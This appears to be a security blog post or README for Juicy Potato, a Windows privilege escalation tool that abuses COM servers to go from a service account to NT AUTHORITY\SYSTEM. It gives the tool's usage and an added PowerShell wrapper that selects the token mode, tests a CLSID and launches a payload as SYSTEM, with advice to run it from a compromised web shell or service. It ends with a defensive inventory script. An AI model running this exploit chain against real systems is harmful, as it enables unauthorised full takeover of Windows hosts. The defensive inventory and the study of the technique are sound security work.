
Juicy Potato : A Sugared Version Of RottenPotatoNG, With A Bit Of Juice

Juicy Potato is a sugared version of RottenPotatoNG, with a bit of juice, i.e. another local privilege escalation tool, from Windows service accounts to NT AUTHORITY\SYSTEM.

Summary

RottenPotatoNG and its variants leverage a privilege escalation chain built on the BITS service: the BITS COM server is tricked into authenticating to a man-in-the-middle listener on 127.0.0.1:6666, and the resulting SYSTEM token can be used as long as the current user holds the SeImpersonate or SeAssignPrimaryToken privilege. During a Windows build review we found a setup where BITS was intentionally disabled and port 6666 was taken.

We decided to weaponize RottenPotatoNG. Say hello to Juicy Potato.

For the theory, see Rotten Potato – Privilege Escalation from Service Accounts to SYSTEM and follow the chain of links and references.

We discovered that, other than BITS, there are several COM servers we can abuse. They just need to:

  • be instantiable by the current user, normally a “service user” that has impersonation privileges
  • implement the IMarshal interface
  • run as an elevated user (SYSTEM, Administrator, …)

After some testing we obtained and tested an extensive list of interesting CLSIDs on several Windows versions.

Juicy Details

JuicyPotato allows you to:

  • Target CLSID
    pick any CLSID you want; the project ships a list organized by OS.
  • COM listening port
    define the COM listening port you prefer (instead of the hardcoded 6666 in the marshalled object)
  • COM listening IP address
    bind the server on any IP
  • Process creation mode
    depending on the privileges held by the current (service) user, you can choose from:
    • CreateProcessWithToken (needs SeImpersonate)
    • CreateProcessAsUser (needs SeAssignPrimaryToken)
    • both
  • Process to launch
    launch an executable or script if the exploitation succeeds
  • Process argument
    customize the launched process arguments
  • RPC server address
    for a stealthy approach you can authenticate to an external RPC server
  • RPC server port
    useful if you want to authenticate to an external server and a firewall is blocking port 135
  • TEST mode
    mainly for testing purposes, i.e. testing CLSIDs. It creates the DCOM object and prints the user of the token obtained, without launching anything.

Usage

T:\>JuicyPotato.exe
JuicyPotato v0.1

Mandatory args:
-t createprocess call: <t> CreateProcessWithTokenW, <u> CreateProcessAsUser, <*> try both
-p <program>: program to launch
-l <port>: COM server listen port

Optional args:
-m <ip>: COM server listen address (default 127.0.0.1)
-a <argument>: command line argument to pass to program (default NULL)
-k <ip>: RPC server ip address (default 127.0.0.1)
-n <port>: RPC server listen port (default 135)
-c <{clsid}>: CLSID (default BITS:{4991d34b-80a1-4291-83b6-3328366b9097})
-z only test CLSID and print token's user

Example
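An added worked example, not code from the original post or from the JuicyPotato project: the PowerShell script below strings the options above together the way they are used in practice. It reads the current token's privileges with whoami /priv to choose the -t mode, picks a COM listen port that is actually free (the situation that motivated the -l option), runs the chosen CLSID in test mode (-z) first, and only launches the program if the test returned a SYSTEM token. It assumes JuicyPotato.exe is in the current directory, that the CLSID is one from the project's per-OS list (the BITS default is used as a placeholder), that Get-NetTCPConnection is available (Windows 8 / Server 2012 and later), and that the program and its arguments are placeholders you replace.

```powershell
# Added example: a wrapper around JuicyPotato.exe, not part of the tool itself.
# Assumptions: JuicyPotato.exe is in the current directory, $Clsid comes from the
# per-OS CLSID list shipped with the project, Get-NetTCPConnection is available
# (Windows 8 / Server 2012 and later), and $Program/$Arguments are placeholders.
param(
    [string]$JuicyPotato   = '.\JuicyPotato.exe',
    [string]$Clsid         = '{4991d34b-80a1-4291-83b6-3328366b9097}',    # BITS, the tool's default
    [string]$Program       = 'C:\Windows\System32\cmd.exe',
    [string]$Arguments     = '/c whoami > C:\Windows\Temp\jp_whoami.txt',  # placeholder payload
    [int]   $PreferredPort = 6666
)

# 1. Which of the two privileges does the current token hold?
#    'whoami /priv' lists a privilege even when its state is Disabled; that is fine,
#    JuicyPotato enables it itself, but a privilege that is absent cannot be enabled.
$privText         = (whoami /priv) -join "`n"
$hasImpersonate   = $privText -match 'SeImpersonatePrivilege'
$hasAssignPrimary = $privText -match 'SeAssignPrimaryTokenPrivilege'
if (-not ($hasImpersonate -or $hasAssignPrimary)) {
    throw 'Neither SeImpersonatePrivilege nor SeAssignPrimaryTokenPrivilege is present; JuicyPotato cannot work from this token.'
}
# -t t -> CreateProcessWithTokenW (needs SeImpersonate)
# -t u -> CreateProcessAsUser     (needs SeAssignPrimaryToken)
# -t * -> try both
$mode = if ($hasImpersonate -and $hasAssignPrimary) { '*' } elseif ($hasImpersonate) { 't' } else { 'u' }

# 2. Pick a COM listen port that is not already bound (the scenario that motivated -l).
try   { $inUse = (Get-NetTCPConnection -State Listen).LocalPort }
catch { $inUse = @() }   # cmdlet missing on old builds: just try the preferred port
$port = $PreferredPort
while ($inUse -contains $port) { $port++ }

# 3. Test mode first: -z only instantiates the COM object and prints the user of the
#    token it obtained, e.g. "{...};NT AUTHORITY\SYSTEM", without launching anything.
$testOutput = (& $JuicyPotato -z -l $port -c $Clsid 2>&1) -join "`n"
Write-Host $testOutput
if ($testOutput -notmatch 'NT AUTHORITY\\SYSTEM') {
    Write-Warning "CLSID $Clsid did not yield a SYSTEM token on this build; pick another CLSID from the list for this OS."
    return
}

# 4. Real run with the mode chosen in step 1.
Write-Host "Running JuicyPotato on port $port with -t $mode"
& $JuicyPotato -l $port -c $Clsid -p $Program -a $Arguments -t $mode
```

Run it from the context you have obtained as the service account (a web shell, a service binary, a scheduled task), not from an administrator prompt, since the whole point is that the privilege check reflects the token of the compromised process. If step 3 reports a user other than SYSTEM, or an authentication error, the CLSID is not abusable on that Windows build and the per-OS list is the place to pick the next candidate.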

Final Thoughts

If the user has SeImpersonate or SeAssignPrimaryToken privileges then you are SYSTEM. Note that, as the project itself documents, JuicyPotato does not work on Windows Server 2019 or Windows 10 build 1809 and later.

It’s nearly impossible to prevent the abuse of all these COM servers. You could try to modify the permissions of these objects via DCOMCNFG, but good luck: this is going to be challenging.

The actual solution is to protect the sensitive accounts and applications that run under the * SERVICE accounts. Stopping DCOM would certainly inhibit this exploit but could have a serious impact on the underlying OS.
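Since the realistic defence is knowing which accounts and services put you one bug away from SYSTEM, here is an added defensive inventory in PowerShell (not code from the original post or the JuicyPotato project). It exports the local user-rights assignment with secedit to show which principals hold SeImpersonatePrivilege and SeAssignPrimaryTokenPrivilege, resolves the SIDs to names, and then lists every service running under LOCAL SERVICE, NETWORK SERVICE or an NT SERVICE\ virtual account. It assumes an elevated PowerShell session, because secedit /export requires administrator rights; the temporary file name is a placeholder.

```powershell
# Added example: a defensive inventory, not part of the JuicyPotato project.
# Assumes an elevated PowerShell session (secedit /export needs administrator rights).

# (a) Who holds the two privileges the technique needs, from the local security policy.
#     secedit writes lines such as:
#       SeImpersonatePrivilege = *S-1-5-32-544,*S-1-5-6,*S-1-5-19,*S-1-5-20
#     S-1-5-6 is the SERVICE group: every process started by the service control
#     manager is a member, including those running under NT SERVICE\ virtual accounts.
$cfg = Join-Path $env:TEMP 'userrights.inf'   # placeholder path for the exported policy
secedit /export /cfg $cfg /areas USER_RIGHTS | Out-Null
$rights = Get-Content $cfg | Where-Object { $_ -match '^Se(Impersonate|AssignPrimaryToken)Privilege' }
foreach ($line in $rights) {
    $name, $sidList = $line -split '\s*=\s*', 2
    $accounts = foreach ($sid in ($sidList -split ',')) {
        $sid = $sid.TrimStart('*')
        try   { (New-Object System.Security.Principal.SecurityIdentifier($sid)).Translate([System.Security.Principal.NTAccount]).Value }
        catch { $sid }   # keep the raw SID if it does not resolve on this host
    }
    '{0}: {1}' -f $name, ($accounts -join ', ')
}
Remove-Item $cfg -ErrorAction SilentlyContinue

# (b) Which services run under the built-in service accounts (the "* SERVICE" accounts the
#     text refers to) or a virtual account. A code-execution bug in any of these, or in an
#     application worker hosted by one, hands the attacker a token that satisfies (a).
Get-CimInstance Win32_Service |
    Where-Object { $_.StartName -match 'LocalService|NetworkService|^NT SERVICE\\' } |
    Select-Object Name, StartName, State, PathName |
    Sort-Object StartName, Name |
    Format-Table -AutoSize
```

The first list is the one you cannot shrink much: removing the SERVICE group from SeImpersonatePrivilege breaks legitimate impersonation in services. The second list is the actionable one: every entry in it, and every application pool or custom service you add to it, is an account whose compromise ends at SYSTEM, which is why the text above puts the emphasis on protecting those accounts and applications rather than on the COM servers.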


R K
